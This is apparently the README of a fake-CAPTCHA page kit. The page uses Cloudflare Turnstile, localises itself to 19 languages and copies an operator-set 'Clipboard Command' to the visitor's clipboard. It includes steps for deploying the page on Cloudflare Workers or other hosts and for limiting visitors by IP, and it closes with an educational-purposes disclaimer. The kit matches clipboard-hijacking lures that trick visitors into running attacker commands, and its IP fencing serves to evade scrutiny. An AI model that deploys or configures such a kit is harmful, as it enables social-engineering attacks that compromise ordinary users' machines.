- Allow/Block IP's based on hardcoded config
- Supports 19 languages, auto-selects CAPTCHA language based on the user's browser request
- Integrates Cloudflare Turnstile CAPTCHA
- Automatically inserts domain details
-
Drop the JavaScript code into a Cloudflare Worker, Cloudflare Page, or any website hosting page.
-
Set your Clipboard Command:
const JS = `
const CONFIG = {
command: "Your Clipboard Command Here"
};`- Configure IP Fencing (optional):
const ALLOWED_IPS = [];Created for educational/research/blue-team purposes only!